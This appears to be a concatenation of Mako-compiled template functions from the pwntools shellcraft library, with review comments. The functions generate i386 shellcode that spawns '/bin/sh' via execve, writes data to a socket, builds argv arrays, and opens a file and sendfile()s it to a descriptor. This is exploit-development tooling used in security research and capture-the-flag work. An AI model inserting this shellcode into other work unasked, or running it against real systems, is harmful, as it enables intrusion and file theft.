def render_body(context, **pageargs):
    """Mako-compiled template body: emit i386 assembly for execve('/bin///sh').

    This is generated code (Mako compiles each ``.asm`` template into a
    ``render_body``); the ``__M_*`` names are the template runtime's helpers.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    # Push a frame so nested <%call>/caller blocks see this template's scope;
    # popped unconditionally in the ``finally`` below.
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        # Mako bookkeeping: copy the names just bound into __M_locals
        # (presumably so nested blocks can reference them).
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # SYS_execve is imported but never referenced below; the syscall is
        # named by the string literal 'SYS_execve' instead.
        from pwnlib.constants.linux.i386 import SYS_execve

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['SYS_execve']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        # Push the path string onto the stack (pushstr's default presumably
        # appends a NUL -- other templates pass append_null=False to avoid it),
        # then call execve with esp as the path and NULL argv/envp.
        __M_writer(unicode(i386.pushstr('/bin///sh')))
        __M_writer(u'\n\n')
        __M_writer(unicode(i386.linux.syscall('SYS_execve', 'esp', 0, 0)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, string, sock='ebp', **pageargs):
    """Mako-compiled template body: emit i386 assembly that write()s a string.

    Generated code; the ``__M_*`` names belong to the Mako runtime.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        string: the data to write. It is pushed onto the stack without a
            trailing NUL and its Python length is passed as the byte count.
        sock: register (or value) holding the destination file descriptor;
            defaults to the 'ebp' register name and is passed through unchanged.
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs,
                                      sock=sock,
                                      string=string)
        # Mako resolves builtins used by the template through the context.
        len = context.get('len', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # SYS_write is imported but the syscall below is named by string literal.
        from pwnlib.constants.linux.i386 import SYS_write

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['SYS_write']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        # No NUL is appended: the byte count passed to write() is len(string).
        __M_writer(unicode(i386.pushstr(string, append_null=False)))
        __M_writer(u'\n')
        # write(sock, esp, len(string)) -- esp points at the pushed data.
        __M_writer(
            unicode(i386.linux.syscall('SYS_write', sock, 'esp', len(string))))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, value, **pageargs):
    """Mako-compiled template body: emit an i386 ``push`` of *value*.

    Generated code; the ``__M_*`` names belong to the Mako runtime.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        value: an int/long, which is packed to 32 bits and pushed via
            ``pushstr``; anything else is interpolated verbatim after ``push``.
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, value=value)
        # Mako resolves builtins used by the template through the context;
        # these shadow the real builtins for the rest of the function.
        int = context.get('int', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        long = context.get('long', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.util import packing

        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['packing']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        import re

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['re']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        if isinstance(value, (int, long)):
            # Numeric path: write our own "/* push <repr> */" comment, then the
            # pushstr output for the 32-bit little-endian packing of the value
            # (the trailing True is presumably the signed flag -- confirm
            # against packing.pack). The re.sub strips the first leading
            # comment line pushstr emits so only our comment remains; the
            # False argument suppresses the trailing NUL.
            __M_writer(u'    /* push ')
            __M_writer(unicode(repr(value)))
            __M_writer(u' */\n    ')
            __M_writer(
                unicode(
                    re.sub(
                        r'^\s*/.*\n', '',
                        i386.pushstr(packing.pack(value, 32, 'little', True),
                                     False), 1)))
            __M_writer(u'\n')
        else:
            # Non-numeric path: the value is interpolated into the assembly
            # text unescaped; the caller is responsible for its content.
            __M_writer(u'    push ')
            __M_writer(unicode(value))
            __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, filename, fd=1, **pageargs):
    """Mako-compiled template body: emit i386 assembly that open()s a file and
    sendfile()s it to a descriptor.

    Generated code; the ``__M_*`` names belong to the Mako runtime.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        filename: path pushed onto the stack and passed to open().
        fd: destination descriptor for sendfile(); defaults to 1 (stdout).
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs,
                                      fd=fd,
                                      filename=filename)
        __M_writer = context.writer()

        from pwnlib.shellcraft import i386
        from pwnlib.shellcraft import common

        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386', 'common']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        # NOTE(review): ``label`` is allocated here but never referenced in the
        # emitted assembly below; the template emits no loop.
        label = common.label("sendfile_loop")

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['label']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n\n    ')
        __M_writer(unicode(i386.pushstr(filename)))
        __M_writer(u'\n    ')
        # open(esp, 0, O_RDONLY): esp points at the pushed filename.
        __M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
        __M_writer(u'\n    ')
        # sendfile(fd, eax, NULL, 0x7fffffff): eax holds open()'s return value.
        # There is no check of that result, so a failed open() passes its
        # negative errno straight through as the input descriptor.
        __M_writer(
            unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, **pageargs):
    """Mako-compiled template body: emit a fixed i386 execve('/bin//sh') stub.

    Generated code; the ``__M_*`` names belong to the Mako runtime. Unlike the
    syscall-helper templates, the bulk of this one is a literal assembly
    string (including its own ``/* */`` comments) written verbatim.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # Literal prologue: zero eax and push it (a NULL terminator on the
        # stack), then the path string is pushed by the pushstr helper below.
        __M_writer(
            u"\n\n\n    /*  Clear eax, ecx, edx */\n    xor eax, eax\n    push eax\n\n    /*  Push '/bin//sh' */\n"
        )
        __M_writer(unicode(i386.pushstr("/bin//sh")))
        # Literal epilogue: ecx = esp (the path pointer), a sequence of pushes,
        # then ``mov al, SYS_execve`` -- which relies on the earlier
        # ``xor eax, eax`` having cleared the upper bytes -- and ``int 0x80``.
        # The string's own comment describes the intended call; it is emitted
        # as-is and not validated here.
        __M_writer(
            u'\n    mov ecx, esp\n\n    /*  execve("/bin//sh", {junk, 0}, {0}); */\n    push eax\n    push esp\n    push esp\n    push ecx\n    push eax\n    mov al, SYS_execve\n    int 0x80\n\n'
        )
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, reg, array, **pageargs):
    """Mako-compiled template body: push a NULL-terminated array of strings
    onto the stack (argv/envp style) and leave its address in *reg*.

    Generated code; the ``__M_*`` names belong to the Mako runtime.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        reg: register used as scratch and as the result; it is interpolated
            verbatim into ``push``/``add`` text and is not validated here.
        array: a single str (wrapped into a one-element list) or a list of
            strings; each element is normalized to end in exactly one NUL.
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(array=array, reg=reg, pageargs=pageargs)
        # Mako resolves builtins used by the template through the context;
        # these shadow the real builtins for the rest of the function.
        reversed = context.get('reversed', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        len = context.get('len', UNDEFINED)
        str = context.get('str', UNDEFINED)
        enumerate = context.get('enumerate', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        # ``(str)`` is just ``str``; a bare string becomes a one-element array.
        if isinstance(array, (str)):
            array = [array]

        # NOTE(review): dead assignment -- overwritten unconditionally below.
        array_str = ''

        # Normalize all of the arguments' endings
        array = [arg.rstrip('\x00') + '\x00' for arg in array]
        array_str = ''.join(array)

        # ``offset`` starts past the whole blob plus one word, and is walked
        # back one string at a time in the loop below to address each element.
        word_size = 4
        offset = len(array_str) + word_size

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([
                (__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
                ['word_size', 'array', 'offset', 'array_str', 'arg']
                if __M_key in __M_locals_builtin_stored
            ]))
        # 1. Push all strings as one concatenated blob.
        __M_writer(u'    /* push argument array ')
        __M_writer(unicode(repr(array)))
        __M_writer(u' */\n    ')
        __M_writer(unicode(i386.pushstr(array_str)))
        __M_writer(u'\n    ')
        # 2. Push a NULL pointer to terminate the array.
        __M_writer(unicode(i386.mov(reg, 0)))
        __M_writer(u'\n    push ')
        __M_writer(unicode(reg))
        __M_writer(u' /* null terminate */\n')
        # 3. For each element, last first: compute its esp-relative offset
        #    (accounting for the words already pushed), add esp, push the
        #    resulting pointer.
        for i, arg in enumerate(reversed(array)):
            __M_writer(u'    ')
            __M_writer(
                unicode(i386.mov(reg, offset + word_size * i - len(arg))))
            __M_writer(u'\n    add ')
            __M_writer(unicode(reg))
            __M_writer(u', esp\n    push ')
            __M_writer(unicode(reg))
            __M_writer(u' /* ')
            __M_writer(unicode(repr(arg)))
            __M_writer(u' */\n    ')
            offset -= len(arg)

            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(
                __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                                  for __M_key in ['offset']
                                  if __M_key in __M_locals_builtin_stored]))
        # 4. reg = esp, i.e. the address of the pointer array just built.
        __M_writer(u'    ')
        __M_writer(unicode(i386.mov(reg, 'esp')))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context,path='/bin///sh',argv=0,envp=0,**pageargs):
    """Mako-compiled template body: emit i386 assembly for execve(path, argv, envp).

    Generated code; the ``__M_*`` names belong to the Mako runtime.

    Args:
        context: Mako render context; provides ``writer()`` and ``caller_stack``.
        path: a str that is not a register name is pushed onto the stack and
            replaced by 'esp'; a register name or any other value is passed
            through to the syscall unchanged.
        argv: a list/tuple is materialized with pushstr_array into the ABI's
            fourth argument register; otherwise passed through (default 0).
        envp: a dict is flattened to 'k=v' strings first; a list/tuple is
            materialized into the ABI's third argument register; otherwise
            passed through (default 0).
        **pageargs: additional template arguments, kept only in the locals snapshot.

    Returns:
        '' -- all assembly text is written through ``context.writer()``.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(path=path,pageargs=pageargs,envp=envp,argv=argv)
        # Mako resolves builtins used by the template through the context;
        # these shadow the real builtins for the rest of the function.
        dict = context.get('dict', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        list = context.get('list', UNDEFINED)
        str = context.get('str', UNDEFINED)
        tuple = context.get('tuple', UNDEFINED)
        __M_writer = context.writer()

        from pwnlib.shellcraft import i386, registers
        from pwnlib.abi import linux_i386_syscall as abi
        
        
        # Mako bookkeeping: copy the names just bound into __M_locals.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['abi','i386','registers'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        # A dict environment becomes a list of 'NAME=value' strings so the
        # list/tuple branch below can handle it.
        if isinstance(envp, dict):
            envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
        
        
        # 'k' and 'v' are listed because Python 2 comprehensions leak their
        # loop variables; the membership guard makes this harmless otherwise.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['k','envp','v'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        # Build argv on the stack; afterwards ``argv`` names the register that
        # holds its address (ABI argument slot 3).
        if isinstance(argv, (list, tuple)):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[3], argv)))
            __M_writer(u'\n    ')
            argv = abi.register_arguments[3] 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['argv'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        # Same for envp, into ABI argument slot 2.
        if isinstance(envp, (list, tuple)):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[2], envp)))
            __M_writer(u'\n    ')
            envp = abi.register_arguments[2] 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['envp'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        # Push the path last so esp points at it when the syscall is emitted.
        # NOTE(review): only ``str`` is checked -- a unicode/bytes path that is
        # not a register name would be passed to the syscall unchanged; confirm
        # which text types callers may supply.
        if isinstance(path, str) and not registers.is_register(path):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr(path)))
            __M_writer(u'\n    ')
            path = 'esp' 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['path'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        __M_writer(u'    ')
        __M_writer(unicode(i386.syscall('SYS_execve', path, argv, envp)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()